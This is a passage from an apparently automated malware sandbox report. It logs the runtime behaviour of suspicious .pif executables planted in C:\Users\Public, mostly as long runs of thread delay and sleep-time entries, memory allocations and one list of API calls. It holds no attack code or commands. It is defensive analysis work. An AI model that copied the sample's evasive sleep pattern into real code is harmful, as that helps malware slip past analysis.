            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 28910000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: 286C0000 memory reserve | memory write watch
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598974Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596246Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595094Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594641Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599766
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599641
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599516
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599297
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599188
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599063
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598938
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598828
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598719
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598594
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595622
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595500
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595391
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595266
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595156
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595047
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594936
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594828
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594688
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594559
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594452
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594344
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594234
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599874
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599756
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599625
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599515
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599296
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599187
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599078
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598968
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598749
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598635
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598515
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598296
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598187
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598078
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597968
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597749
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597640
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597531
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597421
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597312
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597203
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597093
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596984
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596765
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596656
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596546
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596437
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596328
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596218
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596109
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595999
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595890
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595780
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595671
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595562
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595453
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595343
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595234
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595015
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594906
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594796
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594686
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594578
            Source: C:\Users\Public\Libraries\yihfsboC.pifWindow / User API: threadDelayed 8892Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifWindow / User API: threadDelayed 949Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifWindow / User API: threadDelayed 8184
            Source: C:\Users\Public\Libraries\yihfsboC.pifWindow / User API: threadDelayed 1643
            Source: C:\Users\Public\Libraries\yihfsboC.pifWindow / User API: threadDelayed 7560
            Source: C:\Users\Public\Libraries\yihfsboC.pifWindow / User API: threadDelayed 2292
            Source: C:\Users\Public\alpha.pifAPI coverage: 6.2 %
            Source: C:\Users\Public\alpha.pifAPI coverage: 7.9 %
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFAPI coverage: 9.5 %
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8084Thread sleep count: 8892 > 30Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8084Thread sleep count: 949 > 30Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598974s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598734s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598516s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -598063s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596246s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -596016s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595563s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595438s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595313s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -595094s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594641s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594422s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8080Thread sleep time: -594313s >= -30000sJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep count: 33 > 30
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -30437127721620741s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599875s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8120Thread sleep count: 8184 > 30
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8120Thread sleep count: 1643 > 30
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599766s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599641s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599516s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599406s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599297s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599188s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -599063s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598938s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598828s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598719s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598594s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598485s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598360s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598235s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -598110s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597985s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597860s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597735s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597610s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597485s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597360s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597235s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -597110s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596985s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596860s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596735s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596610s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596485s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596360s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596235s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -596110s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595985s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595860s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595735s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595622s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595500s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595391s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595266s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595156s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -595047s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594936s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594828s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594688s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594559s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594452s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594344s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594234s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8116Thread sleep time: -594125s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep count: 33 > 30
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -30437127721620741s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8136Thread sleep count: 7560 > 30
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599874s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8136Thread sleep count: 2292 > 30
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599756s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599625s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599515s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599406s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599296s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599187s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -599078s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598968s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598859s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598749s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598635s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598515s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598406s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598296s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598187s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -598078s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597968s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597859s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597749s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597640s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597531s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597421s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597312s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597203s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -597093s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596984s >= -30000s
